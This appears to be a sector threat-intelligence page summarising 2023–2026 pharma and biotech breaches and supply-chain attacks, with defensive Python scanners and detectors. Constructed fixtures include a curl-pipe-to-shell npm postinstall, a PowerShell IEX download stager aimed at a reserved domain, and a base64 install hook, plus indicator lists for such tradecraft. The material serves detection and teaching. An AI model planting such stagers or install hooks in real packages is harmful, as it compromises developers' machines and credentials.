Biotechnology/Greentech
Breach intelligence, attack campaigns, and threat reports targeting the Biotechnology/Greentech sector.
Biotechnology/Greentech Threat Reports
Novo Nordisk 2026 Breach: A Wake-Up Call for Software Development Security
In March 2026, Novo Nordisk, a leading pharmaceutical company, suffered a significant security breach that began with a GitHub personal access token exposed in client-side JavaScript served from one of its subdomains. The threat group FulcrumSec used the token to clone private repositories, harvest additional credentials, and move deeper into the company's network. Over more than two months the attackers exfiltrated approximately 1.3TB of sensitive data, including source code, proprietary drug information, clinical trial data, internal AI models, and personal information of healthcare professionals and clinical trial participants. The breach was publicly disclosed on June 11, 2026, after unauthorized access to internal IT systems was detected. The incident is a failure of secrets management in the software development pipeline rather than of any exotic technique: a credential embedded in a public web asset is effectively published, and an over-scoped token turns one leaked string into access to every repository it can read. Organizations should treat development platforms as production systems: keep secrets out of client-side bundles, scope and expire access tokens, scan both commits and deployed assets for credentials, and alert on unusual clone or authentication activity against code repositories.
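The initial access described above is a token sitting in a file that every visitor's browser downloads. The scanner below is an added example, not code from the report or from Novo Nordisk: it runs the check a build pipeline should apply to every deployed JavaScript bundle, matching the GitHub token prefixes GitHub documents (the fine-grained PAT length range is approximate) plus AWS access key IDs, since a cloned repository usually yields further credentials of that kind. The sample bundle and the token values in it are constructed and fake.

```python
import re

# Token formats as documented by GitHub: classic personal access tokens and
# app/OAuth tokens are a prefix plus 36 base62 characters; fine-grained PATs
# start with github_pat_ and are longer (the length range below is approximate).
# AWS access key IDs are included because a cloned repository usually yields
# further credentials of this kind.
SECRET_PATTERNS = {
    "github_token": re.compile(r"\b(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9]{36}\b"),
    "github_fine_grained_pat": re.compile(r"\bgithub_pat_[A-Za-z0-9_]{60,}\b"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
}


def redact(secret: str) -> str:
    """Keep enough of the token to identify it in a revocation ticket, no more."""
    return secret[:8] + "..." + secret[-4:]


def find_secrets(js_source: str) -> list[dict]:
    """Scan a client-side bundle line by line and return every credential match."""
    findings = []
    for lineno, line in enumerate(js_source.splitlines(), start=1):
        for kind, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append(
                    {"kind": kind, "line": lineno, "token": redact(match.group(0))}
                )
    return findings


# Constructed sample of a bundled front-end file; both credential values are fake.
SAMPLE_JS = "\n".join([
    "const API = 'https://api.github.com';",
    "const headers = { Authorization: 'token ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8' };",
    "fetch(API + '/repos/example-org/private-repo/contents', { headers });",
    "const uploader = { accessKeyId: 'AKIAEXAMPLEEXAMPLE01' };",
])

if __name__ == "__main__":
    for finding in find_secrets(SAMPLE_JS):
        print(f"line {finding['line']}: {finding['kind']} {finding['token']}")
```

Run it against the built static assets, not just the source tree, because bundlers inline environment variables at build time and a secret that never appears in a commit can still end up in the shipped file. A hit is treated as a compromise, not a finding to triage: revoke and rotate first, then review the token's scope and the repository audit log for clones you do not recognise.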
6 days ago
Novo Nordisk's 2026 Data Breach: A Wake-Up Call for Pharma Cybersecurity
In June 2026, Danish pharmaceutical company Novo Nordisk reported a cybersecurity incident involving unauthorized access to certain internal IT systems. Non-public data was copied externally, including pseudonymized patient information from some clinical trials: patient IDs, trial participation details, sex, year of birth, biomarkers, health data, and lifestyle factors. The data did not include direct identifiers such as patient names, which lowers the risk of immediate identification; pseudonymized records that still carry year of birth, sex, biomarkers, and trial membership can nevertheless be re-identified when joined with other data sets, so the exposure should not be treated as harmless. The company promptly launched an investigation with external cybersecurity experts and notified the relevant authorities. Certain internal systems were temporarily taken offline, but Novo Nordisk confirmed that core business operations were unaffected. The incident underscores the persistent targeting of sensitive health data in the pharmaceutical industry, and the value of rapid response and transparent communication in maintaining trust and regulatory compliance after a security incident.
1 week ago
Shai-Hulud Attack Compromises 19 Science-Focused PyPI Packages
In June 2026, a supply-chain attack known as 'Shai-Hulud' compromised 19 science-focused packages on the Python Package Index (PyPI), including the bioinformatics tools Dynamo, Spateo, CoolBox, U-FISH, and Napari-UFISH. The attackers injected malicious code into these packages which, upon execution, attempted to download and run additional scripts that harvest developer credentials: GitHub tokens, cloud service credentials, and SSH keys. Credentials are the point of such a campaign, because each stolen publishing or cloud token lets the attacker seed further packages or reach infrastructure. The incident is part of a broader rise in supply-chain attacks on open-source ecosystems. Practical defences include pinning dependencies to exact versions with hashes, installing from a vetted internal mirror rather than directly from the public index, scanning dependencies and their install hooks for suspicious code, and rotating any developer credentials present on machines that installed an affected version.
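A Python package can run code at install time by subclassing a setuptools command in its setup.py, and at import time in any module. The audit below is an added example, not the Shai-Hulud payload or any project's code: it parses Python source with the standard `ast` module and reports install-hook subclasses, `cmdclass` overrides, and imports or calls into modules (subprocess, base64, urllib and the like) that have no business in a scientific package's build script. The indicator lists and the sample setup.py are constructed; its payload only echoes a string.

```python
import ast

# Modules and builtins that have no business in a scientific package's setup.py.
RISKY_MODULES = {"subprocess", "os", "base64", "socket", "ctypes",
                 "urllib", "requests", "zlib", "marshal"}
RISKY_BUILTINS = {"exec", "eval", "compile", "__import__"}
# setuptools commands that run during `pip install`; subclassing one is the
# standard way to attach arbitrary code to installation.
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext"}


def _base_name(node: ast.expr) -> str:
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return node.attr
    return ""


def audit_setup_py(source: str) -> list[dict]:
    """Return install-time execution indicators found in Python source, by line."""
    findings = []

    def add(node, issue):
        findings.append({"line": node.lineno, "issue": issue})

    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    add(node, f"imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                add(node, f"imports from {node.module}")
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _base_name(base) in INSTALL_COMMANDS:
                    add(node, f"class {node.name} hooks the {_base_name(base)} command")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in RISKY_BUILTINS:
                add(node, f"calls {func.id}()")
            elif (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)
                  and func.value.id in RISKY_MODULES):
                add(node, f"calls {func.value.id}.{func.attr}()")
            if isinstance(func, ast.Name) and func.id == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        add(node, "setup() overrides cmdclass")
    return sorted(findings, key=lambda f: f["line"])


# Constructed sample of the install-hook pattern; the payload only runs `echo hi`.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import base64, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.run(["sh", "-c", base64.b64decode(b"ZWNobyBoaQ==").decode()])

setup(name="example-bio-tool", version="1.0.0", cmdclass={"install": PostInstall})
"""

CLEAN_SETUP_PY = 'from setuptools import setup\nsetup(name="example-bio-tool", version="1.0.0")\n'

if __name__ == "__main__":
    for finding in audit_setup_py(SAMPLE_SETUP_PY):
        print(f"line {finding['line']}: {finding['issue']}")
```

Because the function parses arbitrary Python, the same pass can be run over every module in a package to catch import-time payloads, which is where a downloader would sit once a package is used rather than merely installed. Preferring wheels (`pip install --only-binary=:all:`) removes the setup.py execution step entirely, and `--require-hashes` with a pinned requirements file blocks a replaced version from installing at all.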
2 weeks ago
California Attorney General Sues 23andMe Over 2023 Data Breach
In October 2023, genetic testing company 23andMe experienced a significant data breach affecting approximately 6.9 million users, including 855,541 Californians. Attackers exploited reused passwords through a credential-stuffing attack, initially compromising around 14,000 accounts. Because 23andMe's 'DNA Relatives' feature exposes data across linked accounts, each compromised login revealed information about many other users, and the breach expanded to ancestry reports, health predispositions, and DNA matches. The company faced multiple lawsuits and regulatory fines, ultimately filing for bankruptcy in March 2025. In May 2026, California Attorney General Rob Bonta filed a lawsuit against 23andMe, now known as Chrome Holding Co., alleging failure to implement reasonable safeguards against credential-stuffing attacks and misleading public statements regarding the breach. The incident shows how a feature that links accounts multiplies the impact of each individual compromise of sensitive genetic data. Credential stuffing only works because passwords are reused; the controls that blunt it are multi-factor authentication, screening new passwords against known-breached lists, and rate limiting and anomaly detection on logins that arrive from a single source against many different accounts.
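The signature of credential stuffing is not many failures for one account (that is a brute-force or a forgetful user) but failures for many different accounts from one source in a short span, with the occasional success where a reused password matched. The detector below is an added example, not 23andMe's telemetry or code: it runs a sliding window over a constructed authentication log, flags sources whose distinct failed usernames exceed a threshold, and lists the accounts that logged in successfully from those sources, which are the accounts to lock and reset and, in a DNA Relatives-style design, the pivot points into other users' data. The log format and thresholds are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed authentication log, one event per line: "timestamp source_ip username result".
SAMPLE_AUTH_LOG = """\
2023-10-01T12:00:01Z 203.0.113.7 alice FAIL
2023-10-01T12:00:02Z 203.0.113.7 bob FAIL
2023-10-01T12:00:03Z 203.0.113.7 carol FAIL
2023-10-01T12:00:04Z 203.0.113.7 dave FAIL
2023-10-01T12:00:05Z 203.0.113.7 erin FAIL
2023-10-01T12:00:06Z 203.0.113.7 frank FAIL
2023-10-01T12:00:07Z 203.0.113.7 grace OK
2023-10-01T12:00:08Z 203.0.113.7 heidi FAIL
2023-10-01T12:05:00Z 198.51.100.4 alice FAIL
2023-10-01T12:05:09Z 198.51.100.4 alice FAIL
2023-10-01T12:05:20Z 198.51.100.4 alice OK
"""


def parse_line(line: str):
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result


def max_distinct_users_in_window(failures, window: timedelta) -> int:
    """Largest number of distinct usernames that failed within any span of `window`.

    `failures` is a time-sorted list of (timestamp, username); two pointers keep
    the window, a Counter tracks how many distinct users are inside it."""
    counts = Counter()
    best = left = 0
    for t_right, user in failures:
        counts[user] += 1
        while t_right - failures[left][0] > window:
            old = failures[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect_credential_stuffing(log_text: str, window_s: int = 60,
                               distinct_user_threshold: int = 5) -> dict:
    """Flag source IPs that fail for many distinct users inside one window and list
    the accounts that logged in successfully from them."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            t, ip, user, result = parse_line(line)
            by_ip[ip].append((t, user, result))
    window = timedelta(seconds=window_s)
    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [(t, u) for t, u, r in events if r == "FAIL"]
        distinct = max_distinct_users_in_window(failures, window)
        if distinct >= distinct_user_threshold:
            findings[ip] = {
                "distinct_failed_users": distinct,
                "accounts_to_reset": sorted({u for _, u, r in events if r == "OK"}),
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Real campaigns rotate through proxy pools, so a per-IP key alone will miss a slow, distributed run; keying additionally on ASN, TLS fingerprint or device attributes, and comparing the submitted credentials against known-breached lists at login time, closes that gap. The successful logins the detector reports are the ones worth investigating first, because each represents a working password on a reused account.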
3 weeks ago
West Pharmaceutical Services Ransomware Attack Disrupts Global Operations
In May 2026, West Pharmaceutical Services, a leading manufacturer of pharmaceutical packaging and delivery systems, experienced a significant ransomware attack. Detected on May 4, the attack involved unauthorized data exfiltration and system encryption, leading the company to proactively shut down and isolate affected on-premise infrastructure globally. This containment measure temporarily disrupted business operations worldwide. The company engaged Palo Alto Networks' Unit 42 for incident response and notified law enforcement. As of May 11, core enterprise systems had been restored, and critical shipping, receiving, and manufacturing processes had restarted at some sites; however, a complete restoration timeline had not been finalized. The financial impact of the incident remains under assessment. This incident underscores the escalating threat of ransomware attacks targeting critical infrastructure sectors, including pharmaceutical manufacturing. Organizations in these sectors must prioritize robust cybersecurity measures, incident response planning, and employee training to mitigate the risk of such disruptive attacks.
1 month ago
Medtronic Confirms 2026 Data Breach by ShinyHunters
In April 2026, Medtronic, the world's largest medical device company, confirmed a data breach involving unauthorized access to certain corporate IT systems. The cybercriminal group ShinyHunters claimed responsibility, alleging the theft of over 9 million records containing personally identifiable information (PII) and terabytes of internal corporate data. Medtronic stated that the breach did not impact their products, patient safety, or business operations, emphasizing that the affected corporate IT systems are separate from those supporting their products and manufacturing operations. The company is conducting an ongoing investigation to determine the full scope of the incident and any potential exposure of personal data. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/medtronic-confirms-breach-after-hackers-claim-9-million-records-theft/?utm_source=openai)) This incident underscores the escalating threat posed by cyber extortion groups like ShinyHunters, who have been increasingly targeting large organizations across various sectors. The breach highlights the critical importance of robust cybersecurity measures and the need for organizations to remain vigilant against sophisticated cyber threats that can compromise sensitive data and disrupt operations.
1 month ago
Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks
In April 2026, Chinese national Xu Zewei was extradited from Italy to the United States to face charges related to cyberattacks conducted between February 2020 and June 2021. Xu, allegedly operating under the direction of China's Ministry of State Security, targeted U.S. universities and organizations to steal COVID-19 research data. He exploited vulnerabilities in Microsoft Exchange Server, compromising thousands of systems worldwide. Xu was arrested in Milan in July 2025 and now faces multiple charges, including wire fraud and aggravated identity theft. ([justice.gov](https://www.justice.gov/opa/pr/prolific-chinese-state-sponsored-contract-hacker-extradited-italy?utm_source=openai)) This incident underscores the persistent threat posed by state-sponsored cyber espionage, particularly in the context of global health crises. The extradition highlights international cooperation in combating cybercrime and the ongoing need for robust cybersecurity measures to protect sensitive research and infrastructure.
1 month ago
Critical npm Supply Chain Attack Exposes Developer Credentials
In April 2026, a supply chain attack targeted the Node Package Manager (npm) ecosystem, compromising multiple packages from Namastex Labs, a company specializing in AI-based solutions. The attackers injected malicious code into these packages to steal developer credentials, API keys, SSH keys, and other sensitive data. The malware behaved like a worm: it searched compromised systems for npm publishing tokens and used them to inject the same malicious code into every other package those tokens could publish, spreading rapidly across the npm ecosystem. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/new-npm-supply-chain-attack-self-spreads-to-steal-auth-tokens/?utm_source=openai)) The incident underscores the escalating threat of supply chain attacks within open-source ecosystems and the leverage a trusted package gives an attacker. Beyond auditing dependencies, the worm-like propagation points at two specific controls: publishing tokens should be short-lived, scoped to a single package and protected by two-factor authentication (or replaced by provenance-based publishing flows) so a stolen token cannot push new versions of everything its owner maintains, and install-time scripts should be disabled by default in CI and developer environments so a compromised dependency cannot run code on the machine that installs it.
2 months ago
GPUBreach 2026: Unveiling the Latest NVIDIA GPU Rowhammer Attack
In April 2026, researchers from the University of Toronto unveiled 'GPUBreach,' a sophisticated attack leveraging Rowhammer techniques on NVIDIA GPUs equipped with GDDR6 memory. This method enables unprivileged CUDA kernels to induce bit-flips in GPU page tables, granting arbitrary GPU memory access. Exploiting vulnerabilities in NVIDIA drivers, attackers can escalate privileges to achieve full system compromise, even with Input-Output Memory Management Unit (IOMMU) protections active. The attack was demonstrated on NVIDIA RTX A6000 GPUs, commonly used in AI development and training workloads. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/new-gpubreach-attack-enables-system-takeover-via-gpu-rowhammer/?utm_source=openai)) The emergence of GPUBreach underscores a significant evolution in hardware-based attacks, highlighting the necessity for robust hardware security measures. As adversaries increasingly exploit hardware vulnerabilities, organizations must prioritize comprehensive security strategies that encompass both software and hardware components to mitigate such advanced threats.
2 months ago
Malicious npm Package Poses as OpenClaw Installer, Deploys RAT on macOS
In early March 2026, a malicious npm package named '@openclaw-ai/openclawai' was discovered posing as an installer for OpenClaw. Uploaded on March 3, 2026, by a user named 'openclaw-ai', the package was downloaded 178 times before detection. On installation it executed a postinstall script that deployed a remote access trojan (RAT) capable of stealing system credentials, browser data, cryptocurrency wallets, SSH keys, Apple Keychain databases, and iMessage history. The malware also established persistence, giving the operators continuing remote access and data exfiltration. The lure depended on the trust developers place in widely used package managers like npm and on a package name and publisher name that imitate the legitimate project; the postinstall hook is what turned a download into code execution. Together with the persistence mechanisms, this illustrates why install-time scripts need to be controlled in software development pipelines rather than trusted by default.
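Both this package and the self-spreading Namastex Labs compromise above rely on npm running a lifecycle script at install time, before anyone has read the code. The audit below is an added example, not code from either report or from npm: it reads a package.json, lists every lifecycle hook npm executes automatically, and marks hooks whose command matches indicators of payload staging (download-and-pipe-to-shell, inline `node -e` code, base64 decoding, dynamic evaluation, child process spawning). The indicator list and the sample manifests are constructed; example.invalid is a reserved domain that never resolves.

```python
import json
import re

# Scripts npm runs on its own during install, pack or publish.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish",
                   "prepublishOnly", "prepack", "postpack", "preuninstall", "postuninstall")

# Constructed indicators of install-time payload staging; tune to your environment.
INDICATORS = [
    ("download cradle", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|node)\b")),
    ("inline node code (-e)", re.compile(r"\bnode\s+(?:-e|--eval)\b")),
    ("base64 decoding", re.compile(r"base64|atob\(|Buffer\.from\([^)]*base64")),
    ("dynamic evaluation", re.compile(r"\beval\(|new Function\(")),
    ("child process spawn", re.compile(r"child_process|execSync|spawnSync")),
]


def audit_package_json(text: str) -> list[dict]:
    """Return every lifecycle hook in a package.json with the indicators it trips.

    A hook with no indicator is still reported as 'review': any code that runs at
    install time deserves a look, because that is exactly where a RAT dropper sits."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        hits = [name for name, pattern in INDICATORS if pattern.search(command)]
        findings.append({
            "hook": hook,
            "command": command,
            "indicators": hits,
            "severity": "high" if hits else "review",
        })
    return findings


# Constructed manifests: one with a dropper-style postinstall, one benign.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-ai-agent-sdk",
    "version": "2.4.1",
    "scripts": {
        "build": "tsc -p .",
        "test": "node --test",
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -fsSL https://example.invalid/setup.sh | sh')\"",
    },
})

BENIGN_PACKAGE_JSON = json.dumps({
    "name": "example-lib", "version": "1.0.0", "scripts": {"build": "tsc -p ."},
})

if __name__ == "__main__":
    for finding in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(finding["severity"], finding["hook"], finding["indicators"])
```

Run this over the package.json of every package in node_modules after a fresh `npm ci --ignore-scripts`, so the manifests are on disk but nothing has executed yet; `npm config set ignore-scripts true` makes that the default for developer machines. A postinstall that merely runs `node scripts/install.js` trips no indicator here, which is the reason hooks without hits are still reported for review rather than dropped: the script file it points to needs the same reading.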
3 months ago
UFP Technologies Cyberattack: A 2026 Data Theft Incident
In February 2026, UFP Technologies, a leading medical device manufacturer, detected unauthorized access to its IT systems. The breach, identified on February 14, led to the theft and potential destruction of company data, impacting critical functions such as billing and label creation for customer deliveries. Immediate containment measures were implemented, and external cybersecurity experts were engaged to investigate and remediate the incident. The company has since restored access to the affected information and believes the threat actor has been removed from its systems. This incident underscores the escalating cyber threats targeting the healthcare sector, emphasizing the need for robust cybersecurity measures. Organizations must remain vigilant against sophisticated attacks that can disrupt operations and compromise sensitive data, highlighting the importance of proactive defense strategies and incident response planning.
4 months ago
Konni APT Leverages AI-Generated PowerShell to Breach Blockchain Developers
In January 2026, the North Korean-linked APT group Konni conducted a phishing campaign targeting blockchain developers and engineering teams in Japan, Australia, and India. Using AI-generated PowerShell malware delivered through convincing spear-phishing emails, the attackers gained footholds in the targeted organizations, then moved laterally and exfiltrated sensitive intellectual property and digital assets, expanding their historical targeting beyond South Korea and parts of Europe. The campaign illustrates an evolution in attacker tradecraft: AI is used to produce malicious code quickly and in variants that evade signature-based defenses. It also marks a notable increase in both AI-assisted malware and the targeting of the blockchain sector. With threat actors broadening their geographic reach and operational sophistication, organizations should re-evaluate their controls around script execution (PowerShell logging and constrained language mode), endpoint monitoring of process creation, and identity and access management, so that a phishing-delivered script cannot quietly become a persistent foothold.
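Whether a PowerShell stager was written by a person or generated by a model, it still has to be launched by a process, and that launch is what endpoint monitoring sees. The report gives no details of Konni's script, so the analyzer below is an added example of the generic check, not the campaign's code: it takes a process-creation command line, decodes an `-EncodedCommand` payload (base64 of the UTF-16LE script, with the abbreviated flag forms PowerShell accepts), and flags download-and-execute tradecraft in both the visible arguments and the decoded script. The indicator list is an assumption to be tuned, and the sample command line is constructed around a reserved domain.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload that
# follows is base64 of the script text encoded as UTF-16LE.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc[a-z]*)\s+([A-Za-z0-9+/=]{16,})",
    re.I,
)

# Constructed indicators of download-and-execute and evasion tradecraft.
INDICATORS = [
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no profile", re.compile(r"-nop\b|-noprofile", re.I)),
    ("nested base64", re.compile(r"FromBase64String", re.I)),
    ("defender exclusion", re.compile(r"Add-MpPreference", re.I)),
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real payload, or truncated by the log source


def analyze_powershell(cmdline: str) -> dict:
    """Decode the payload, then match indicators against arguments and script together."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, pattern in INDICATORS if pattern.search(haystack)]
    return {"decoded": decoded, "indicators": hits}


# Constructed sample of what a process-creation event (Sysmon Event ID 1 or
# Windows 4688) would record for a stager; example.invalid never resolves.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    result = analyze_powershell(SAMPLE_CMDLINE)
    print(result["decoded"])
    print(result["indicators"])
```

Script block logging (Event ID 4104) records the decoded script directly once it is enabled, which makes this decoding step unnecessary on hosts that have it; the command-line path is still worth keeping for hosts that only forward process-creation events, and for the first seconds of an intrusion before the script block is written.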
5 months ago